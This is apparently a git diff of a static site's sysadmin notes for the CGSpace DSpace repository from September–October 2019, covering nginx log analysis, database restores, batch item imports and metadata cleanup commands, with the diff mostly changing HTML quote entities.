# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -60,7 +60,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -72,7 +72,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
7249 2a01:7e00::f03c:91ff:fe18:7396
9124 45.5.186.2
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,7 +163,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -174,7 +174,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -193,14 +193,14 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
</code></pre><ul>
<li>It actually got mostly HTTP 200 responses:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | awk &#39;{print $9}&#39; | sort | uniq -c
1775 200
703 499
72 503
</code></pre><ul>
<li>And it was mostly requesting Discover pages:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | grep 163.172.71.23 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
2350 discover
71 handle
</code></pre><ul>
@ -284,11 +284,11 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<li>Around the same time I see the following in the DSpace log:</li>
</ul>
<pre tabindex="0"><code>2019-09-15 15:32:18,079 INFO org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644
2019-09-15 15:32:18,135 WARN org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&quot;METSRIGHTS&quot;
2019-09-15 15:32:18,135 WARN org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&#34;METSRIGHTS&#34;
</code></pre><ul>
<li>I see a lot of these errors today, but not earlier this month:</li>
</ul>
<pre tabindex="0"><code># grep -c 'Cannot find named plugin' dspace.log.2019-09-*
<pre tabindex="0"><code># grep -c &#39;Cannot find named plugin&#39; dspace.log.2019-09-*
dspace.log.2019-09-01:0
dspace.log.2019-09-02:0
dspace.log.2019-09-03:0
@ -307,9 +307,9 @@ dspace.log.2019-09-15:808
</code></pre><ul>
<li>Something must have happened when I restarted Tomcat a few hours ago, because earlier in the DSpace log I see a bunch of errors like this:</li>
</ul>
<pre tabindex="0"><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.METSRightsCrosswalk&quot;, name=&quot;METSRIGHTS&quot;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.OREDisseminationCrosswalk&quot;, name=&quot;ore&quot;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&quot;, name=&quot;dim&quot;
<pre tabindex="0"><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.METSRightsCrosswalk&#34;, name=&#34;METSRIGHTS&#34;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.OREDisseminationCrosswalk&#34;, name=&#34;ore&#34;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&#34;, name=&#34;dim&#34;
</code></pre><ul>
<li>I restarted Tomcat and the item views came back, but then the Solr statistics cores didn&rsquo;t all load properly
<ul>
@ -326,9 +326,9 @@ dspace.log.2019-09-15:808
# docker run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-08-31.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>Elizabeth from CIAT sent me a list of sixteen authors who need to have their ORCID identifiers tagged with their publications
@ -339,26 +339,26 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Kihara, Job&quot;,&quot;Job Kihara: 0000-0002-4394-9553&quot;
&quot;Twyman, Jennifer&quot;,&quot;Jennifer Twyman: 0000-0002-8581-5668&quot;
&quot;Ishitani, Manabu&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Arango, Jacobo&quot;,&quot;Jacobo Arango: 0000-0002-4828-9398&quot;
&quot;Chavarriaga Aguirre, Paul&quot;,&quot;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&quot;
&quot;Paul, Birthe&quot;,&quot;Birthe Paul: 0000-0002-5994-5354&quot;
&quot;Eitzinger, Anton&quot;,&quot;Anton Eitzinger: 0000-0001-7317-3381&quot;
&quot;Hoek, Rein van der&quot;,&quot;Rein van der Hoek: 0000-0003-4528-7669&quot;
&quot;Aranzales Rondón, Ericson&quot;,&quot;Ericson Aranzales Rondon: 0000-0001-7487-9909&quot;
&quot;Staiger-Rivas, Simone&quot;,&quot;Simone Staiger: 0000-0002-3539-0817&quot;
&quot;de Haan, Stef&quot;,&quot;Stef de Haan: 0000-0001-8690-1886&quot;
&quot;Pulleman, Mirjam&quot;,&quot;Mirjam Pulleman: 0000-0001-9950-0176&quot;
&quot;Abera, Wuletawu&quot;,&quot;Wuletawu Abera: 0000-0002-3657-5223&quot;
&quot;Tamene, Lulseged&quot;,&quot;Lulseged Tamene: 0000-0002-3806-8890&quot;
&quot;Andrieu, Nadine&quot;,&quot;Nadine Andrieu: 0000-0001-9558-9302&quot;
&quot;Ramírez-Villegas, Julián&quot;,&quot;Julian Ramirez-Villegas: 0000-0002-8044-583X&quot;
&#34;Kihara, Job&#34;,&#34;Job Kihara: 0000-0002-4394-9553&#34;
&#34;Twyman, Jennifer&#34;,&#34;Jennifer Twyman: 0000-0002-8581-5668&#34;
&#34;Ishitani, Manabu&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Arango, Jacobo&#34;,&#34;Jacobo Arango: 0000-0002-4828-9398&#34;
&#34;Chavarriaga Aguirre, Paul&#34;,&#34;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&#34;
&#34;Paul, Birthe&#34;,&#34;Birthe Paul: 0000-0002-5994-5354&#34;
&#34;Eitzinger, Anton&#34;,&#34;Anton Eitzinger: 0000-0001-7317-3381&#34;
&#34;Hoek, Rein van der&#34;,&#34;Rein van der Hoek: 0000-0003-4528-7669&#34;
&#34;Aranzales Rondón, Ericson&#34;,&#34;Ericson Aranzales Rondon: 0000-0001-7487-9909&#34;
&#34;Staiger-Rivas, Simone&#34;,&#34;Simone Staiger: 0000-0002-3539-0817&#34;
&#34;de Haan, Stef&#34;,&#34;Stef de Haan: 0000-0001-8690-1886&#34;
&#34;Pulleman, Mirjam&#34;,&#34;Mirjam Pulleman: 0000-0001-9950-0176&#34;
&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
&#34;Tamene, Lulseged&#34;,&#34;Lulseged Tamene: 0000-0002-3806-8890&#34;
&#34;Andrieu, Nadine&#34;,&#34;Nadine Andrieu: 0000-0001-9558-9302&#34;
&#34;Ramírez-Villegas, Julián&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
</code></pre><ul>
<li>I tested the file on my local development machine with the following invocation:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>In my test environment this added 390 ORCID identifiers</li>
<li>I ran the same updates on CGSpace and DSpace Test and then started a Discovery re-index to force the search index to update</li>
@ -386,11 +386,11 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
<li>Follow up with Marissa again about the CCAFS phase II project tags</li>
<li>Generate a list of the top 1500 authors on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = &#39;contributor&#39; AND qualifier = &#39;author&#39;) AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
</code></pre><ul>
<li>Then I used <code>csvcut</code> to select the column of author names, strip the header and quote characters, and saved the sorted file:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/&quot;//g' | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
<pre tabindex="0"><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed &#39;s/&#34;//g&#39; | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
</code></pre><ul>
<li>After adding the XML formatting back to the file I formatted it using XML tidy:</li>
</ul>
@ -416,7 +416,7 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ perl-rename -n 's/_{2,3}/_/g' *.pdf
<pre tabindex="0"><code>$ perl-rename -n &#39;s/_{2,3}/_/g&#39; *.pdf
</code></pre><ul>
<li>I was preparing to run SAFBuilder for the Bioversity migration and decided to check the list of PDFs on my local machine versus on DSpace Test (where I had downloaded them last month)
<ul>
@ -426,25 +426,25 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ rename -v 's/___/_/g' *.pdf
$ rename -v 's/__/_/g' *.pdf
<pre tabindex="0"><code>$ rename -v &#39;s/___/_/g&#39; *.pdf
$ rename -v &#39;s/__/_/g&#39; *.pdf
</code></pre><ul>
<li>I&rsquo;m still waiting to hear what Carol and Francesca want to do with the <code>1195.pdf.LCK</code> file (for now I&rsquo;ve removed it from the CSV, but for future reference it has the number 630 in its permalink)</li>
<li>I wrote two fairly long GREL expressions to clean up the institutional author names in the <code>dc.contributor.author</code> and <code>dc.identifier.citation</code> fields using OpenRefine
<ul>
<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&quot;:</li>
<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&rdquo;:</li>
</ul>
</li>
</ul>
<pre tabindex="0"><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&quot;&quot;)
<pre tabindex="0"><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&#34;&#34;)
</code></pre><ul>
<li>The second targets cities and countries after names like &ldquo;International Livestock Research Institute, Kenya&rdquo;:</li>
</ul>
<pre tabindex="0"><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&quot;&quot;)
<pre tabindex="0"><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&#34;&#34;)
</code></pre><ul>
<li>I imported the 1,427 Bioversity records with bitstreams to a new collection called <a href="https://dspacetest.cgiar.org/handle/10568/103688">2019-09-20 Bioversity Migration Test</a> on DSpace Test (after splitting them in two batches of about 700 each):</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx768m&#39;
$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity1.map -s /home/aorth/Bioversity/bioversity1
$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bioversity/bioversity2
</code></pre><ul>
@ -513,7 +513,7 @@ $ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bio
</li>
<li>Get a list of institutions from CCAFS&rsquo;s Clarisa API and try to parse it with <code>jq</code>, do some small cleanups and add a header in <code>sed</code>, and then pass it through <code>csvcut</code> to add line numbers:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/&quot;//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' &gt; /tmp/clarisa-institutions.csv
<pre tabindex="0"><code>$ cat ~/Downloads/institutions.json| jq &#39;.[] | {name: .name}&#39; | grep name | awk -F: &#39;{print $2}&#39; | sed -e &#39;s/&#34;//g&#39; -e &#39;s/^ //&#39; -e &#39;1iname&#39; | csvcut -l | sed &#39;1s/line_number/id/&#39; &gt; /tmp/clarisa-institutions.csv
$ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv -u
</code></pre><ul>
<li>The csv-metadata-quality tool caught a few records with excessive spacing and unnecessary Unicode</li>


@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="October, 2019"/>
<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -113,7 +113,7 @@
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
<pre tabindex="0"><code>$ csvcut -c &#39;id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]&#39; ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
</code></pre><ul>
<li>Then I replace them in vim with <code>:% s/\%u00a0/ /g</code> because I can&rsquo;t figure out the correct sed syntax to do it directly from the pipe above</li>
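<li>For what it&rsquo;s worth, GNU sed can match the UTF-8 bytes of U+00A0 directly, so an untested sketch like this should work in the pipe:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 'id,dc.title[en_US]' ~/Downloads/10568-16814.csv | sed 's/\xc2\xa0/ /g' &gt; /tmp/iwmi-title.csv
</code></pre>
<ul>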
<li>I uploaded those to CGSpace and then re-exported the metadata</li>
@ -121,7 +121,7 @@
<li>I modified the script so it replaces the non-breaking spaces instead of removing them</li>
<li>Then I ran the csv-metadata-quality script to do some general cleanups (though I temporarily commented out the whitespace fixes because it was too many thousands of rows):</li>
</ul>
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x &#39;dc.date.issued,dc.date.issued[],dc.date.issued[en_US]&#39; -u
</code></pre><ul>
<li>That fixed 153 items (unnecessary Unicode, duplicates, commaspace fixes, etc)</li>
<li>Release <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.3.1">version 0.3.1 of the csv-metadata-quality script</a> with the non-breaking spaces change</li>
@ -134,7 +134,7 @@
<ul>
<li>Create an account for Bioversity&rsquo;s ICT consultant Francesco on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
<pre tabindex="0"><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p &#39;fffff&#39;
</code></pre><ul>
<li>Email Francesca and Carol to ask for follow up about the test upload I did on 2019-09-21
<ul>
@ -193,20 +193,20 @@
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p &#39;fuananaaa&#39;
</code></pre><h2 id="2019-10-11">2019-10-11</h2>
<ul>
<li>I ran the DSpace cleanup function on CGSpace and it found some errors:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(171221) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(171221) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution, as always, is (repeat as many times as needed):</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);&#39;
UPDATE 1
</code></pre><h2 id="2019-10-12">2019-10-12</h2>
<ul>
@ -229,12 +229,12 @@ International Centre for Tropical Agriculture,International Center for Tropical
International Maize and Wheat Improvement Center (CIMMYT),International Maize and Wheat Improvement Center
International Centre for Agricultural Research in the Dry Areas,International Center for Agricultural Research in the Dry Areas
International Maize and Wheat Improvement Centre,International Maize and Wheat Improvement Center
&quot;Agricultural Information Resource Centre, Kenya.&quot;,&quot;Agricultural Information Resource Centre, Kenya&quot;
&quot;Centre for Livestock and Agricultural Development, Cambodia&quot;,&quot;Centre for Livestock and Agriculture Development, Cambodia&quot;
&#34;Agricultural Information Resource Centre, Kenya.&#34;,&#34;Agricultural Information Resource Centre, Kenya&#34;
&#34;Centre for Livestock and Agricultural Development, Cambodia&#34;,&#34;Centre for Livestock and Agriculture Development, Cambodia&#34;
</code></pre><ul>
<li>Then I applied it with my <code>fix-metadata-values.py</code> script on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f from -m 211 -t to
</code></pre><ul>
<li>I did some manual curation of about 300 authors in OpenRefine in preparation for telling Peter and Abenet that the migration is almost ready
<ul>
@ -270,7 +270,7 @@ real 82m35.993s
</code></pre><ul>
<li>I looked in the database to find authors that had &ldquo;|&rdquo; in them:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
<pre tabindex="0"><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE &#39;%|%&#39;;
text_value | resource_id
----------------------------------+-------------
Anandajayasekeram, P.|Puskur, R. | 157
@ -280,7 +280,7 @@ real 82m35.993s
</code></pre><ul>
<li>Then I found their handles and corrected them, for example:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;157&#39; and handle.resource_type_id=2;
handle
-----------
10568/129
@ -304,10 +304,10 @@ real 82m35.993s
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
$ mkdir 2019-10-15-Bioversity
$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-10-15-Bioversity
$ sed -i '/&lt;dcvalue element=&quot;identifier&quot; qualifier=&quot;uri&quot;&gt;/d' 2019-10-15-Bioversity/*/dublin_core.xml
$ sed -i &#39;/&lt;dcvalue element=&#34;identifier&#34; qualifier=&#34;uri&#34;&gt;/d&#39; 2019-10-15-Bioversity/*/dublin_core.xml
</code></pre><ul>
<li>It&rsquo;s really stupid, but for some reason the handles are included even though I specified the <code>-m</code> option, so after the export I removed the <code>dc.identifier.uri</code> metadata values from the items</li>
<li>Then I imported a test subset of them in my local test environment:</li>
@ -317,7 +317,7 @@ $ sed -i '/&lt;dcvalue element=&quot;identifier&quot; qualifier=&quot;uri&quot;&
<li>I had forgotten (again) that the <code>dspace export</code> command doesn&rsquo;t preserve collection ownership or mappings, so I will have to create a temporary collection on CGSpace to import these to, then do the mappings again after import&hellip;</li>
<li>On CGSpace I will increase the RAM of the command line Java process for good luck before import&hellip;</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s 2019-10-15-Bioversity
</code></pre><ul>
<li>After importing the 1,367 items I re-exported the metadata, changed the owning collections to those based on their type, then re-imported them</li>
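<li>That round trip is roughly the following (collection handle from the import above; path hypothetical):</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-export -i 10568/104057 -f /tmp/bioversity-imported.csv
$ # edit the collection column per item type, then:
$ dspace metadata-import -f /tmp/bioversity-imported.csv -e fuu@cgiar.org
</code></pre>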


@ -15,17 +15,17 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
So 4.6 million from XMLUI and another 1.2 million from API requests
Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
" />
<meta property="og:type" content="article" />
@ -45,20 +45,20 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
